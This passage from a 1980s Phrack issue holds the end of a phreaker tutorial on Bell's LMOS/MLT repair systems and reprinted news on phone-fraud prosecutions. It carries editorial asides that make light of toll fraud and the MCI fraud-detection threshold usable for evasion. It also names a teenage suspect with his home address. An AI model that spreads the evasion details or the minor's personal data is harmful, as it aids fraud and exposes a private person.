  1700. LMOS system network. The trouble report is sent along a data link to the Front
  1701. End, where a BOR (Basic Output Report) is requested. BOR's include line record
  1702. information such as past trouble history and numerical values of MLT system
  1703. tests. MLT is Mechanized Loop Testing. As LMOS is responsible for trouble
  1704. reports, past trouble analysis, and other data related functions, MLT, which
  1705. is connected to LMOS through a minicomputer in the Repair Service Bureau known
  1706. as the MLT Controller, does the actual testing of subscriber loops. MLT
  1707. hardware is located in the Repair Service Bureau. This hardware is linked to
  1708. the LMOS system by way of an LMOS minicomputer, which may be in a remote
  1709. location or with the LMOS central processor. Test trunks connect MLT hardware
  1710. to the Wire Centers, which in turn connect with the subscriber loops.
  1711.  
  1712.      The Databases of LMOS are connected via a high speed data link. The major
  1713. divisions of data handled by LMOS are listed below.
  1714.  
  1715.      Past Trouble History- This information is contained within the
  1716. Abbreviated Trouble History (ATH) database and holds the most recent 40 days
  1717. of history.
  1718.  
  1719.      The Trouble History (TH) database contains histories of troubles for the
  1720. day. This TH database is used to support TREAT (Trouble Report Evaluation and
  1721. Analysis Tool) reports.
  1722.  
  1723.      Line Record- These bases contain info about the customer's telephone
  1724. circuit, whether it is POTS (for which there is a separate database), or SS
  1725. (Special Service). Special Services numbers can be up to 16 characters plus
  1726. the NPA or area code. The LMOS definition of an SS is any circuit having an
  1727. identifier that is other than 10 digit numeric with NPA.
  1728.  
  1729.      Also, the Cable (CA), Associated Number (AN), Telephone Answering service
  1730. (TAS), and Central Office Equipment (COE) data bases contain line record
  1731. information as well.
  1732.  
  1733.      Miniline Record- There is one Miniline Record database for each Front End
  1734. transaction processor. An example explaining this would be: A customer makes a
  1735. trouble report to the CRSAB. The data sent through the Cross Front end to the
  1736. Front End database, where a BOR is requested, is recorded and applied as
  1737. status by the Miniline Record database to the Front End base. This helps to
  1738. keep the LMOS Master Database in conjunction with the Front End bases.
  1739.  
  1740.      Service Order History- This base contains a list of all lines changed
  1741. during the day. The list is used for construction of Miniline Records to be
  1742. sent to the front ends.
  1743.  
  1744.      While there are many other databases within the LMOS system which serve a
  1745. variety of functions, the bases listed above are the major ones.
  1746.  
  1747.  
  1748.      The telephone network is divided into two major pieces, the loop portion,
  1749. or the line from a Central Office to the customer premises; and the Toll
  1750. portion. This is the network that connects long distance offices such as the
  1751. Toll center and Primary center, and is also known as the Direct Distance
  1752. Dialing or DDD network. The LMOS database is customer and loop oriented. The
  1753. loop portion of the network is frequently altered and changed, as it is the
  1754. customer's link with the DDD network. These changes are tracked by LMOS. This
  1755. type of activity falls into two categories: Customer initiated service
  1756. requests (when a customer makes a request or trouble report), and Bell
  1757. Operating Company initiated plant changes.
  1758.      'Plant' is the Outside Plant of cable which makes up the local loop.  A
  1759. Customer initiated service request is for installation of new lines for the
  1760. customer. The Universal Service Order or USO is the record of all these types
  1761. of requests. USO's contain information such as customer listing, billing
  1762. section, service and equipment section, and the Assignment section, which
  1763. identifies the Central Office and outside plant (cable) facilities or lines.
  1764.  
  1765.      A BOC initiated plant change is called a work or job order. This is when
  1766. the BOC serving the area make additions and rearrangements to loops to meet
  1767. customer requirements for service. Examples of work orders include the
  1768. following:
  1769.  
  1770.      Cable Throw-This order is when a cable pair is added to assist an
  1771. existing cable in a high-growth area. This involves a change to the customer's
  1772. cable and pair number. Cable Throw Summaries are printouts from this type of
  1773. work order.
  1774.  
  1775.      Area Transfer-This order is used when Wire Centers, or the point where
  1776. customer cable pairs branch out from, have to be balanced to compensate for
  1777. growth, as there will be a need for more subscriber loops. This often involves
  1778. the change of a customer's number.
  1779.  
  1780.      Service Orders pass through a BOC interface program to add RSB
  1781. identifiers, which are repair unit numbers, needed by LMOS to translate data
  1782. to a USO format.
  1783.  
  1784.      The Automatic Line Record Update (ALRU) system is a system that updates
  1785. the data bases of LMOS in response to a service order.
  1786.  
  1787.      Work Orders can either involve a bulk task such as a large cable throw of
  1788. 400 pairs from cable 102 to cable 109, which would use a special bulk-oriented
  1789. program in the Work Order process, or smaller tasks concerning a few cables,
  1790. which would use the Enter Cable Change or ECC transaction.
  1791.  
  1792.      Below is a summary of the Service Order flow through LMOS.
  1793.  
  1794. 1: The customer requests new or changed telephone service for their line.
  1795.  
  1796. 2: The request is entered into the BOC's service order network to be 'worked'.
  1797.  
  1798. 3: A request is made to assign facilities necessary to install or modify the
  1799.    customer service.
  1800.  
  1801. 4: Facilities are assigned and information is sent to the service order
  1802.    network.
  1803.  
  1804. 5: The service order network forwards information to do work to the installer,
  1805.    or the RSB person who does the actual repair or modification on the line.
  1806.  
  1807. 6: Installer completes work, returns notice to service order distribution
  1808.    network that service order has been completed.
  1809.  
  1810. 7: Completed service order goes to the BOC interface program to perform data
  1811.    transactions for standard ALRU input.
  1812.  
  1813. 8: A day's worth of service orders are accumulated and read into the ALRU.
  1814.  
  1815. 9: Automatic Line Record Update automatically updates the LMOS host database.
  1816.  
  1817. Next is a summary of the Work Order flow (for BOC initialized plant changes).
  1818.  
  1819. 1: The Distribution Service Design Center forwards requests for loop facility
  1820.    additions or rearrangements to the Construction Maintenance Center to be
  1821.    worked.
  1822.  
  1823. 2: If the request for work involves existing facilities (ones that are already
  1824.    there), facility assignment information is requested.
  1825.  
  1826. 3: Facilities assigned to the Work Order are forwarded to the Construction
  1827.    Maintenance Center.
  1828.  
  1829. 4: The Construction craft (installers) receives the work instructions.
  1830.  
  1831. 5: Work is completed and notices are sent to the CMC.
  1832.  
  1833. 6: A paper record of the completed work order is distributed to LMOS.
  1834.  
  1835.  
  1836.      When service order and work order activities are combined, an estimated
  1837. 20 megabytes of data in the LMOS host data base is modified in some way every
  1838. working day.
  1839.  
  1840.  
  1841.                                  Part II-MLT
  1842.  
  1843.      The basics of LMOS have been covered in part I. Part II will take a
  1844. closer look at the Mechanized Loop Testing process and its relation with LMOS.
  1845.  
  1846.      As mentioned previously, the equipment for the MLT system is located in
  1847. or near the Central Office or End Office in which the customer loops
  1848. terminate. The MLT equipment (being a third generation of automated testing
  1849. system) is connected by test trunks through the switching system to customer
  1850. loops. The MLT controller located in the Repair Service Bureau enables tests
  1851. to be made on up to 12 local loops simultaneously, sets up the testing
  1852. sequence, and controls the connection of test equipment to the loops. To make
  1853. the appropriate tests, information in the LMOS data base(s) about the customer
  1854. loop and station equipment is transmitted to the MLT controller when the test
  1855. request is initiated. This information controls certain phases of each test
  1856. and is used to analyze and decipher test results.
  1857.      On command from the MLT controller, which will now be referred to as
  1858. simply 'the Controller', the MLT system dials the number to be tested. If the
  1859. line is busy, the cause is automatically determined (a conversation, phone
  1860. off-hook, or a fault), and further tests are not made until the line is free.
  1861. If the line is idle, the MLT system proceeds to make tests for purposes of
  1862. maintenance and detection of faults in the loop.
  1863.  
  1864.                               MLT test specifics
  1865.  
  1866. * AC and DC (Alternating Current and Direct Current) measurements to determine
  1867. if the loop is proper for the customer's station equipment, to determine the
  1868. type and the extent of any electrical leakage through cable insulation, and to
  1869. detect broken cable pairs and the location of the break in terms of distance
  1870. from the CO where MLT is being used.
  1871.  
  1872. * A 'Soak Test' to see if leakage will disappear after a high voltage is
  1873. applied from the Central Office battery. The voltage dries up moisture, which
  1874. is a frequent cause of leakage.
  1875.  
  1876. * A Balance Check to reveal how susceptible the loop is to noise causing
  1877. voltage, which would impair conversation over the line.
  1878.  
  1879. * A measurement to tell whether CO battery voltage (voltage drops when the
  1880. phone goes to an off-hook condition) and dial tone can be placed on the loop.
  1881.  
  1882.      All MLT test measurements are converted by the MLT hardware to digital
  1883. form and returned to the Controller for analysis. The analysis is based on the
  1884. test results and the line-record info from LMOS.
  1885.  
  1886.      Here is an example of how the Automated Repair Service Bureau (ARSB)
  1887. works with the repair service attendants. A customer can't get a dial tone, so
  1888. he calls the repair service from a neighbor's phone. An attendant who answers
  1889. the call types the customer's phone number into a computer terminal. In
  1890. response to this, LMOS displays the customer's name, address, class of service
  1891. (in this case, it would be residential service), and information about any
  1892. recent trouble on that loop. At the same time, LMOS causes the MLT system to
  1893. test the loop. The CRSAB Attendant types in a description of the reported
  1894. trouble. The MLT system returns the results of the tests on the line within a
  1895. few seconds. Say, for example, the fault in question was a cable fault. This
  1896. information would be displayed on the screen. The attendant would tell the
  1897. customer that a visit is not needed, and that line will be repaired by a
  1898. certain time. The data on the screen is automatically added to the LMOS
  1899. database. A BOR is printed in the RSB serving the customer, and is screened to
  1900. decide if it should be given to a dispatcher or a tester. The content of a BOR
  1901. is explained in part one, and a diagram of a BOR is included below.
  1902.  
  1903.  
  1904. **** BASIC OUTPUT REPORT *****                     PAGE- 01
  1905. UNIT-99900000  10-08-86  0300P  TTN-0000110
  1906. TN-999  5557009                                           CAT-CD
  1907. SC-1FR    CS-RES     PUB     CPE-NO    SWC-         WKNG -0-
  1908. SMITH, JOHN
  1909. 1000 NOWHERE LN.
  1910. --RMKR--
  1911.  
  1912. --TRBL--NDT-CCO-CBC-ALL CALLS
  1913. --RCH--                                       REACH NBR-
  1914. COMM-10-09-86  0700P VER-4   CALLED NBR-        OVER-
  1915.                          STATUS-PS  10-09-77  0400P
  1916. --STATUS NAR--
  1917. SO DATE 03-27-85  SO# N0901
  1918.  
  1919. --S/E--
  1920. QTY-0001    USOC-1FRBC  KS-0000   LTD-   REF-
  1921. --ASGM--
  1922. OE-000B-010-09  VT-0146  RT-0500   NSTA-0001   BRG-N   NSV-N
  1923. WC-999 F1   NPA-999    CA-   TT101    PR-109    PRU-    BP-10
  1924. TEA-R1304   NOWHERE LN.
  1925.  
  1926. --HIST--
  1927. NO       REPORT SUBS         CLEARED       TH-KEY  TST  RPM  O/S } T } D } C }
  1928. 1  10-01-85  205P 0 10-02-77 0130P 10-02-77 620P   110  111   *  }330}320}320}
  1929.    REPLACED INSIDE WIRE
  1930.  
  1931. ------------------------------------------------------------------------------
  1932.  
  1933. MLT RESULTS     SUMMARY: OPEN OUT, DISTANCE TO OPEN=39,200 FT
  1934.  
  1935. OPEN OUT
  1936.  OPEN TIP
  1937.  DISTANCE TO OPEN
  1938.   39,200 FT (FROM C.O.)
  1939. VALID DC RESISTANCE AND VOLT
  1940. VALID LINE CKT CONFIGURATION
  1941. CAN DRAW AND BREAK DIAL TONE
  1942.  
  1943. CONTL-01 LTF-01 PORT-09 TRUNK-123 EQU-TPK000 BYD007 DLR002
  1944. FRONT-END PROCESSING DATE AND TIME 10-08-76 0300P
  1945. 370 PROCESSING DATE AND TIME 10-08-86 0302P
  1946. ***END OF DATA***
  1947.  
  1948.      This BOR tells that the trouble is an open tip wire 39,200 feet from the
  1949. Central Office.
  1950.  
  1951.      The first part of the BOR up to the --RMKR-- is the basic information
  1952. section. The second part, from --TRBL-- to SO DATE is the trouble section. The
  1953. next part, from --S/E-- to TEA-R1304 is the assignment section. The fourth
  1954. part, from --HIST-- up to REPLACED INSIDE WIRE is the Abbreviated Trouble
  1955. History section. The last part is the MLT test results section.
  1956.  
  1957.      When a repair looks as if it may not be completed according to schedule,
  1958. a Jeopardy Report is filed. Then, more repairmen are assigned to insure the
  1959. line is repaired on time. After the repair is complete, the dispatcher retests
  1960. the loop using MLT to verify that the trouble has been dealt with. The
  1961. customer is notified, and the final disposition of trouble is entered into the
  1962. LMOS database, where it is stored for future use and evaluation. (See also
  1963. part I.)
  1964.  
  1965.      If you had to sum up LMOS, it would be best summed up by saying LMOS is
  1966. 'A customer repair data management system.'
  1967.  
  1968.  
  1969. Misc footnotes
  1970. --------------
  1971. Section one: Acronyms
  1972.  
  1973. ALRU-Automatic Line Record Update
  1974. AN-Associated Number
  1975. ARSB-Automated Repair Service Bureau
  1976. ATH-Abbreviated Trouble History
  1977. BOC-Bell Operating Company
  1978. BOR-Basic Output Report
  1979. CA-Cable
  1980. COE-Central Office Equipment
  1981. CMC-Construction Maintenance Center
  1982. CRSAB-Centralized Repair Service Answering Bureau
  1983. DDD-Direct Distance Dialing
  1984. ECC-Enter Cable Change
  1985. LMOS-Loop Maintenance Operations System
  1986. MLT-Mechanized Loop Testing
  1987. POTS-Plain Old Telephone Service
  1988. RSB-Repair Service Bureau
  1989. SS-Special Service
  1990. TAS-Telephone Answering Service
  1991. TH-Trouble History
  1992. TREAT-Trouble Report Evaluation and Analysis Tool
  1993.  
  1994.  
  1995.  
  1996. Section two: Automated Testing Systems
  1997.  
  1998.      MLT is the third generation of Automated Testing Systems. The first
  1999. generation of testing equipment was something called the Line Status Verifier,
  2000. which was manually operated, and not nearly as efficient as MLT or the second
  2001. generation, the Automatic Line Verifier. The first and second generations of
  2002. automated testing systems were both eventually built up to the MLT third
  2003. generation type of system.
  2004.  
  2005.  
  2006. -End of file-
  2007.    8/19/86
  2008.  
  2009. ==============================================================================
  2010.                        References and Acknowledgements
  2011. ==============================================================================
  2012. 'Automation improves testing and repair of customer loops' - Bell Labs Record
  2013. 'Automated Repair Service Bureau' - Bell System Technical Journal
  2014.  
  2015.  And thanks to the following people for supplying other information:
  2016. The Videosmith, The Marauder, Lock Lifter, Mark Tabas, and anyone else that we
  2017. might have missed.
  2018.  
  2019.  Sysops are allowed to use this file as long as nothing is changed. This file
  2020. was written in 80 columns, upper and lower case.
  2021.  
  2022.   If you notice any errors in this file please contact one of us and changes
  2023. will be in order.
  2024.  
  2025.                                ==Phrack Inc.==
  2026.  
  2027.                    Volume One, Issue Nine, Phile #10 of 10
  2028.  
  2029. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2030.  
  2031.                         {-=*> Phrack World News <*=-}
  2032.                                  *Issue VIII*
  2033.  
  2034.                          Created by Knight Lightning
  2035.  
  2036.                                   Written by
  2037.                        Knight Lightning and Sally Ride
  2038.  
  2039. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  2040. Welcome readers to PWN Issue VIII!  The last few months have been pretty slow
  2041. in the area of real news and this issue we feature; Phrack World Reprints.
  2042. That's right, unfortunately most of the information in this issue is from
  2043. outside sources.  I hope you find it equally as interesting and remember...
  2044.  
  2045.                             No News Is Good News!
  2046. ______________________________________________________________________________
  2047.  
  2048. TMC Cracks Down                                                August 26, 1986
  2049. ---------------
  2050. Byline article by F. Alan Boyce, Associated Press Writer
  2051.  
  2052. Raleigh (AP) -- The use of home computers to pirate long-distance telephone
  2053. access codes and credit card numbers is increasing and may warrant more
  2054. prosecution and tighter security, federal authorities said Tuesday.
  2055.  
  2056. U.S. Attorney Sam Currin said five recent indictments for computer fraud
  2057. stemmed from a six-month investigation involving home computers and computer
  2058. bulletin boards in 23 states.  By telephoning some computers, people with the
  2059. proper passwords could get numbers that would let them charge phone calls to
  2060. unsuspecting victims or make purchases with stolen credit cards.
  2061.  
  2062. "One bulletin board contained more than 100 stolen telephone access numbers
  2063. and 15 stolen credit card numbers," Curri said.  "With the use of computers
  2064. becoming much more prevalent in our society, we're going to see a lot more of
  2065. this type of activity."
  2066.  
  2067. The probe began with Telemarketing Communications (TMC) of Raleigh, where an
  2068. estimated $100,000 was lost to unauthorized calls in six months.
  2069. Investigators were aided by an unidentified 16-year-old high school student
  2070. who had been caught by Telemarketing officials after making $2,000 worth of
  2071. illegal calls, officials said.
  2072.  
  2073. "That was a tremendous benefit to us in this investigation," Currin said.
  2074. "High school kids today are computer-smart.  They know what they're doing."
  2075. The juvenile was not charged and has made restitution, Currin said.
  2076.  
  2077. U.S. Secret Service Agent William Williamson said the youth provided passwords
  2078. and used his own computer to reach the highest levels of bulletin boards
  2079. operated by those indicted.
  2080.  
  2081. A federal grand jury in Greensboro charged three North Carolina men Monday
  2082. with illegally possessing charge-account numbers and telephone long-distance
  2083. access codes obtained through home computers.
  2084.  
  2085. Robert Edward Lee II of Durham was charged with devising a method for
  2086. defrauding Telemarketing Communications (TMC).  The grand jury also charged
  2087. Michael William McCann of Dobson with possessing more than 15 unauthorized
  2088. telephone access codes and account numbers owned by Telemarketing
  2089. Communications, TransCall America and General Communication Inc.  Tyrone
  2090. Columbus Bullins of Reidsville was charged with possessing 17 unauthorized
  2091. charge numbers and 15 unauthorized telephone access codes and account numbers.
  2092.  
  2093. Ralph Sammie Fig of Knightdale and James Thomas McPhail of Goldsboro were
  2094. indicted on similar charges by a grand jury in the Eastern District Aug. 19.
  2095.  
  2096. Currin said each could face up to 10 years in prison and a $250,000 fine if
  2097. convicted under tough laws passed in 1984.
  2098.  
  2099. "The potential for fraud in this area is very great," he said.  "We have an
  2100. obligation to prosecute violators.  Companies themselves, if they're going to
  2101. stay in business and remain viable, also have an obligation to promote their
  2102. own internal security systems."
  2103.  
  2104. Mike Newkirk of TeleMarketing Communications said it was difficult to protect
  2105. codes without making systems too hard for the average customer to use.
  2106.  
  2107. "There are programs that break codes in security systems such as ours as the
  2108. computer operator is even sleeping," he said.  "It can be randomly broken and
  2109. he can wake up the next morning and just check the file."
  2110.  
  2111. Newkirk said his company was considering installing equipment that could deny
  2112. telephone access to phones where trouble arises.  But he said other
  2113. alternatives, like having operators answer calls to screen for access codes,
  2114. would be too expensive.
  2115.  
  2116. Williamson, however, said one company that changed from computer answering to
  2117. operators reported 5,600 callers hung up when asked for proper codes.
  2118.  
  2119.                Information Provided By Sally Ride:::Space Cadet
  2120. ______________________________________________________________________________
  2121.  
  2122. Here's a news story out of Vancouver, Washington that shows an unusual twist
  2123. on the old cat and mouse game we phreaks play with the feds and phone cops.
  2124. The story should be entitled...
  2125.  
  2126.                               FEDS TRASH HACKER
  2127.                               -----------------
  2128. However, it's really headlined.......
  2129.  
  2130. Teen Age Suspect In Local Computer Probe                      October 10, 1986
  2131. ----------------------------------------
  2132. by Thomas Ryll             The Columbian
  2133.  
  2134. A 15-year-old suspected hacker who reportedly used the nickname "Locksmith" is
  2135. the subject of the first local sheriff's office investigation of alleged use
  2136. of a computer for illegal long-distance telephone use.
  2137.  
  2138. Clark County deputies seized the teen-ager's computer, related equipment, and
  2139. bags of software Tuesday when they acted on a search warrant naming Tony E.
  2140. Gaylord, 10317 N.W. 16th Ave, a Columbia River High School student.
  2141.  
  2142. At one point in the investigation, trash from the Gaylord residence was
  2143. examined for evidence of telephone numbers that had allegedly had been
  2144. misused, according to the warrant.
  2145.  
  2146. The warrant, signed by District Court Judge Robert Moilanen, states that
  2147. officials of American Network have discovered illegal long-distance calls that
  2148. have cost the company more than $1,700.  Items to be seized at the residence
  2149. were to be evidence of first-degree theft and second-degree computer trespass.
  2150.  
  2151. No formal charges have been filed.  Gaylord who was at school when his
  2152. computer was seized, was not arrested, said Ronee Pillsbury, the sheriff's
  2153. office investigator on the case.  The county prosecutor's office is reviewing
  2154. reports, and "we still have quite a bit of work to do on the case," she said.
  2155.  
  2156. American Network is a long-distance telephone service company with offices in
  2157. Vancouver.  Although the firm has prosecuted computer hackers on its own, the
  2158. sheriff's office has never been involved, Pillsbury said.  Despite the fact
  2159. that federal statutes often are involved,  "American Network has not had much
  2160. cooperation from the federal people, who have had a 'don't-come-to-us'
  2161. attitude."
  2162.  
  2163. The novelty of the case is further indicated by mention of the computer
  2164. trespass law, a recent state statute that reflects a law enforcement problem
  2165. that has grown with the proliferation of home computers.  With modems and
  2166. other equipment, unscrupulous users, sometimes called "phreakers," have
  2167. tampered with computer records, made unauthorized telephone calls, pilfered
  2168. bank accounts and otherwise misused equipment.
  2169.  
  2170. The local case surfaced in October 1985, when an American Network "abuse
  2171. analyst" examined company "switch  reports" that "alerted her to a pattern she
  2172. associated with computer hacking," according to the search warrant affidavit,
  2173. which includes a list of telephone numbers all over the country that allegedly
  2174. were illegally dialed.
  2175.  
  2176. Investigation of another hacker led to Gaylord; one day in August, the
  2177. family's garbage was searched by American Network investigators after
  2178. Vancouver Sanitary Service workers bagged it and set it aside.
  2179.  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  2180. Some notes from Sally Ride:::Space Cadet:
  2181. ----------------------------------------
  2182. A novel case in many respects!  Not only was evidence collected by the phone
  2183. cops trashing a hacker's garbage, with the cooperation of the garbage company
  2184. but this is the first case involving the local sheriff's department.
  2185.  
  2186. I have discovered the reason no charges have yet been filed in the case is
  2187. because of an even more unique twist in this tale.  American Network, commonly
  2188. called Amnet and sister company of Savenet, has joined forces with MCI in the
  2189. prosecution of this case and may bring in our good old friend TMC as well to
  2190. aid in the persecution of Locksmith.
  2191.  
  2192. During an interview with April Brown of American Network Security I was
  2193. informed the problems for the Locksmith have only just begun.  The article
  2194. mentions $1,700 worth of calls.  Well, that was when they first swore out the
  2195. warrant.  Amnet now has identified about $4,000 worth of toll and linked it to
  2196. our friend Tony.  But that's not all.  After providing information on the case
  2197. to MCI an amount tripling the Amnet long distance charges has been connected
  2198. with this case.  The Amnet agent had not received an indication from TMC on
  2199. the amount they are bringing to the case.
  2200.  
  2201. The question I have is why are these companies joining forces for the first
  2202. time, that I'm aware of, to dump so hard on this one little guy out of this
  2203. remote neck of the woods?  Part of the reason appears to be because Amnet
  2204. approached Tony's parents in late 1985 about their son's activities and were
  2205. rudely turned away, according to April Brown.
  2206.  
  2207. The other unusual thing about this story is the quote from Amnet about the
  2208. lack of cooperation received from the federal authorities.  Here I thought the
  2209. feds were hot to trot to nail as many of us as possible.  I guess not as hot
  2210. as Amnet wants them to be.
  2211.  
  2212.              Typed and editorialized by Sally Ride:::Space Cadet
  2213. ______________________________________________________________________________
  2214.  
  2215. Football Phreaking?                                            October 1, 1986
  2216. -------------------
  2217. MIAMI (UPI) -- The University of Miami and MCI reached an agreement Wednesday
  2218. that will keep the long-distance carrier from pressing charges against
  2219. Hurricane football players who made long-distance calls using someone else's
  2220. access card number.
  2221.  
  2222. Miami Athletic Director Sam Jankovich met with officials of MCI
  2223. Telecommunications Inc. and said that the matter had been resolved.  The
  2224. company had threatened to press legal action.
  2225.  
  2226. An investigation by the Miami athletic department and MCI found up to 34
  2227. players were involved along with an undetermined number of other students.
  2228. The Miami Herald said the bill for the calls could have been as high as
  2229. $28,000.
  2230.  
  2231. Many of the calls allegedly were made from New Orleans where the Hurricanes
  2232. played in the Sugar Bowl New Year's Day. "We had a telephone conversation and
  2233. visited with MCI officials and another meeting has been set for Friday to go
  2234. over people who still have a balance," Jankovich said.  "MCI has informed me
  2235. they will not press charges against the student athletes involved.  We have 12
  2236. players who still owe money.  We will sit down with those 12 and develop a
  2237. payment schedule on Friday."
  2238.  
  2239. David Berst, director of enforcement for the NCAA in Mission, Kansas, said he
  2240. was unsure if the NCAA would investigate the matter.
  2241.  
  2242. Just goes to show, if you get caught, claim to be a dumb jock...
  2243.  
  2244.                       Information from +++The Mentor+++
  2245. ______________________________________________________________________________
  2246.  
  2247. MCI Gets Scammed                                              October 10, 1986
  2248. ----------------
  2249. ORLANDO, Fla. (UPI)--Jessica Barnett's phone bill this month was no quick
  2250. read--it ran 400 pages long and totaled $90,152.40.
  2251.  
  2252. "Who could pay a $90,000 phone bill?  I'll have to mortgage my house to pay my
  2253. bill," said the 28-year-old housewife, who contacted MCI Telecommunications
  2254. Corp. in Atlanta shortly after opening the 2-inch thick bill.
  2255.  
  2256. "I called them and said, 'Hi, I've got this high bill.'  They asked how much,
  2257. and when I told them they laughed.  They said, 'You've got to be kidding.'"
  2258.  
  2259. MCI spokeswoman Laurie Tolleson said computer hackers apparently discovered
  2260. the Barnett's personal code and used it to make long-distance calls.
  2261.  
  2262. Most of the calls were made to Tennessee, and some lasted nearly two hours,
  2263. Tolleson said.  Others were placed to Georgia, Alabama and Maryland.
  2264.  
  2265. "It's like they call continuously 24 hours a day, all day," Barnett said.  "I
  2266. don't see the point in making these calls.  If I was going to do something
  2267. like that,  I'd be exotic and call Europe--not Tennessee or Norcross, Ga."
  2268.  
  2269. It was not Barnett's first problem with the phone company--she received a
  2270. $17,000 bill in July.  She thought things were straightened out when she did
  2271. not get a bill last month, but the bill that arrived Monday included $70,000
  2272. in past-due charges.  She said she and her husband, Jim, are not taking the
  2273. mix-up too seriously.  "He kidded that now he knows what I do all day,"
  2274. Barnett said.
  2275.  
  2276. "What can you do?  It doesn't bother me as long as I don't have to pay it.   I
  2277. feel bad for MCI.  I think they're getting ripped off."
  2278.  
  2279.                       Typed by Sally Ride:::Space Cadet
  2280. ______________________________________________________________________________
  2281.  
  2282. MCI Introduces VAX Mailgate
  2283. ---------------------------
  2284. VAX Mailgate is a software product that combines the strengths of Digital
  2285. Equipment Corp.'s "All-In-1" Integrated Office And Automation System with MCI
  2286. Mail's public electronic mail service for around-the-world business
  2287. communication.
  2288.  
  2289.                 Information From USA Today-Special MCI Edition
  2290. ______________________________________________________________________________
  2291.  
  2292. MCI Card Fraud Detection Unit - The Online Security System             11/7/86
  2293. -----------------------------
  2294. The following is a brief description of the new on-line security system for
  2295. the MCI Card.  The system developed in order to provide real-time detection of
  2296. excessive (and therefore potentially fraudulent) card usage.  Rather then
  2297. depending on FREWS reports for their current Early Warning System, they are
  2298. now able to investigate and arrest card abuse as it occurs, rather than
  2299. waiting until damage has been done.
  2300.  
  2301. A.  Detection
  2302.  
  2303.     In order to detect possible fraud as it occurs, a counting mechanism in
  2304.     the Fraud Detection Unit will be tracking call attempts for every MCI Card
  2305.     authorization code on a continuous basis.  Generic parameters based on
  2306.     number of call attempts in a specified period (currently 15 calls in a 25
  2307.     minute period) are used to identify potential card abuse.  As soon as the
  2308.     threshold is reached for any one code, Security and Investigation will be
  2309.     notified, via PC screen, hardcopy, and audible alarm.
  2310.  
  2311. B.  Verification
  2312.  
  2313.     Upon notification of a potential problem, Security and Investigations will
  2314.     first pull up the account record to check the Note Screen for anything
  2315.     that may indicate Card abuse (i.e., non-payment, Card lost, stolen, or
  2316.     never received).  They will then try to contact the customer to verify
  2317.     whether the Card is being used legitimately or not.  For problems detected
  2318.     after business hours, the customer will be contacted the following
  2319.     morning.
  2320.  
  2321. C.  Deactivation
  2322.  
  2323.     If the customer has not been making the calls, or if the account phone
  2324.     number is found to be illegitimate, the code will be deactivated
  2325.     immediately in the Card Authorization Center.  If the customer cannot be
  2326.     reached, Security and Investigations will continue to monitor call volumes
  2327.     on the code and will deactivate the code only if the high volumes continue
  2328.     or reappear.
  2329.  
  2330. D.  Reactivation
  2331.  
  2332.     Codes deactivated due to fraud can only be reactivated by Security and
  2333.     Investigations.
  2334. ______________________________________________________________________________
  2335.  
  2336.